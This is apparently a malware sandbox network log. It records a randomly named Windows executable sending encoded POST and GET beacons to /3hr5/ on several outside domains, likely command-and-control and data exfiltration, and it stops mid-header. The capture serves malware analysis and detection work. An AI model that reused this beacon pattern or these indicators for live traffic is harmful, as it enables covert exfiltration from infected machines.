Dec 4, 2023 15:27:30.868264914 CET | 834 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=4Ep+bfZdoWX7Uqo+jO8MD4sdUPabX3T7lkl8IhTpK8uoV92KOLHWsU/yqIDPRsuNTCvcv2T7WDuR/R/TgPRRLyKCUb95bmMHgzAXjki5CusHsfp1zRXWXrfTBIf1/ErHInszxR3DgM/MKUA8rdrVS4xCxUuFPhtYjbNRiBPQq8cCHOOBwQ==
Dec 4, 2023 15:27:31.034743071 CET | 999 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:27:30 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.11.20 | 50206 | 198.252.98.64 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:33.556193113 CET | 1174 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:27:33.726489067 CET | 999 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:27:33 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.11.20 | 50207 | 198.252.98.64 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:36.242688894 CET | 12914 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:27:36.409405947 CET | 999 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:27:36 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.11.20 | 50208 | 198.252.98.64 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:38.928668022 CET | 541 | OUT | GET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:27:39.101649046 CET | 999 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:27:39 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.11.20 | 50209 | 91.195.240.117 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:44.287436008 CET | 810 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=pua0tTD0XFePBgazk9wug9yt189cnqMxpZzgZ+jbfBM/XlRjbbJUFTbKiPFr0/RgqbhUYOHcWvY2cETr6xznsauqvL2f1ubad5ckxsIHM3aduzOblAhsW/jldATtGGKFT5MoPDqzh5UGxLrypX02NNIUJsDZfn5FUH0FfO66xGtE6xKIHQ==
Dec 4, 2023 15:27:44.470504999 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:27:44 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.11.20 | 50210 | 91.195.240.117 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:46.989672899 CET | 1150 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=pua0tTD0XFePABqzo+Yumdyiw89cy6MqpZ/gZ7D1fy4/ZnZjYZhUETbK6fFqpPR7qblcYPrcWvc2eyHrqRzg0Ku1nr2axubMd5ACxtcHMEOdv32bnldtBfjnMQTuImKHT+EgPCS8hLIGwrLyoX0xatIfRsCXX38VSmo6C+un2SYA3g7RZgfA0MZWr8jUh3TUfqCJaFTGVeSpmph/3KMuaEAWnigRQiwhmgMFYkYZF67gKNuKqyaZd5uKfLBoEuDX36PZbyq2yNnrFjI3o0ZfGLFFjB0L0GBGIvWpSnAmZEjuqrCJU32C5RdQh/+UKwv0MshBAhkJipc98uURjGgl1qES0WhN8goJX7Khv/Uj4rkNECfU65CvJpRujjY8nKTx8BD/X2ovA6JY7OIKMxWs66PKwv+0pGqYmL/qBlrgXslup+9zaTVzQ0/41XJ1NeZCmxOjlGsGfv5WfLJFYO0gKgZtkMIhT95C3kPva/BTfy2tJtWTHh8irDg8fge7U/RugnC0mtY=
Dec 4, 2023 15:27:47.172646046 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:27:47 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.11.20 | 50211 | 91.195.240.117 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:49.693974018 CET | 5198 | OUT | POST /3hr5/ HTTP/1.1
Host: www.slimnthinau.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.slimnthinau.com
Referer: http://www.slimnthinau.com/3hr5/
Connection: close
Content-Length: 52912
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:27:49.880814075 CET | 353 | IN | HTTP/1.1 405 Not Allowed
date: Mon, 04 Dec 2023 14:27:49 GMT
content-type: text/html
content-length: 154
server: NginX
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.11.20 | 50212 | 91.195.240.117 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:52.395113945 CET | 533 | OUT | GET /3hr5/?TZd=ksyUunDrVEa0KTu9vPYxs761+eAaxKot9rPDN6rYUiwEC3plPpQTFjv1rO9K0/xZs75gUsnXDeEoWRSVvif2xqzz7ty8+MasXQ==&1dr=yP5PQD38 HTTP/1.1
Host: www.slimnthinau.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:27:52.615515947 CET | 1340 | IN | HTTP/1.1 200 OK
date: Mon, 04 Dec 2023 14:27:52 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
x-powered-by: PHP/8.1.17
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_nzshTYzreklKPSwZ6nwPWlmXy8J2H8rwO3/YgFGxxcZLT94PHxihoa2a4iwu/VzanAuVhUhltkGELOklLD9C8w==
last-modified: Mon, 04 Dec 2023 14:27:52 GMT
x-cache-miss-from: parking-698fb476bf-krcf5
server: NginX
connection: close
Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_nzshTYzreklKPSwZ6nwPWlmXy8J2H8rwO3/YgFGxxcZLT94PHxihoa2a4iwu/VzanAuVhUhltkGELOklLD9C8w==><head><meta charset="utf-8"><title>slimnthinau.com&nbsp;-&nbsp;slimnthinau Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="slimnthinau.com is your first and best source for all of the information youre looking for. From


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.11.20 | 50213 | 217.160.0.27 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:58.198612928 CET | 834 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.austintrafficlawyer.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.austintrafficlawyer.com
                                                                                                                              Referer: http://www.austintrafficlawyer.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=R+Snz8je9vyELVHOo+d4q4W5Wf/Vx/X0n64G1QKqY4u+hLiN3cnz7ueYH12L408cOLkOTNe/Rh10ovjn8E20ykiNBKOM2wbgAI7lfcP5+g8ALYMAfTnhfpCOjwZZnyqpyDz6mumOjaBgJ9cpaBuddFg2Uj83mhF2HKT1aSHi5GIfKmR9LQ==
Dec 4, 2023 15:27:58.402602911 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:58 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.11.20 | 50214 | 217.160.0.27 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:00.914663076 CET | 1174 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.austintrafficlawyer.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.austintrafficlawyer.com
                                                                                                                              Referer: http://www.austintrafficlawyer.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:28:01.109859943 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:01 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.11.20 | 50215 | 217.160.0.27 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:03.633934021 CET | 12914 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.austintrafficlawyer.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.austintrafficlawyer.com
                                                                                                                              Referer: http://www.austintrafficlawyer.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:28:03.822649002 CET | 2626 | OUT | request body data
Dec 4, 2023 15:28:03.822734118 CET | 3912 | OUT | request body data
Dec 4, 2023 15:28:03.822783947 CET | 1340 | OUT | request body data
Dec 4, 2023 15:28:03.823013067 CET | 3912 | OUT | request body data
Dec 4, 2023 15:28:03.823177099 CET | 3912 | OUT | request body data
Dec 4, 2023 15:28:03.823347092 CET | 1340 | OUT | request body data
Dec 4, 2023 15:28:03.823527098 CET | 6484 | OUT | request body data
Dec 4, 2023 15:28:03.823697090 CET | 2626 | OUT | request body data
Dec 4, 2023 15:28:04.011384010 CET | 2626 | OUT | request body data
Dec 4, 2023 15:28:04.011470079 CET | 2626 | OUT | request body data
                                                                                                                              Dec 4, 2023 15:28:04.203397036 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:03 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              85 | 192.168.11.20 | 50216 | 217.160.0.27 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:28:06.351089001 CET | 548 | OUT | GET /3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1
                                                                                                                              Host: www.austintrafficlawyer.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:28:06.544097900 CET | 824 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 626
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:06 GMT
                                                                                                                              Server: Apache
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              86 | 192.168.11.20 | 50217 | 23.227.38.74 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:28:11.796370029 CET | 816 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.littlehappiez.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.littlehappiez.com
                                                                                                                              Referer: http://www.littlehappiez.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=HKr1rJzWZu/irYpCQfcd8XB3jaAhKZq+z6I3cfMiJAA6ywtbk3GheDu2QLXCDY4pBztnNCK7J0Ho9YsktQxoaS1Jo3yLJjtJjRbZoT3+g15jttUTa6UOvdwMZ8obr1jZrOv9HqSw4J/QbbWZLExcC0WeXCWIN3NNsvMlNEaiJBBnonuIVg==
                                                                                                                              Dec 4, 2023 15:28:12.131624937 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:12 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Sorting-Hat-PodId: 293
                                                                                                                              X-Sorting-Hat-ShopId: 83935199526
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              X-ShopId: 83935199526
                                                                                                                              X-ShardId: 293
                                                                                                                              Content-Language: en-US
                                                                                                                              Set-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:12 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:12 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_y=7e9a8744-5900-4053-b9f4-3d92c1cb1401; Expires=Tue, 03-Dec-24 14:28:12 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_s=848dc933-1a65-49de-9c6f-80044a2f9b06; Expires=Mon, 04-Dec-23 14:58:12 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Server-Timing: processing;dur=189
                                                                                                                              X-Shopify-Stage: production
                                                                                                                              Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=18b0d218-e0c6-421
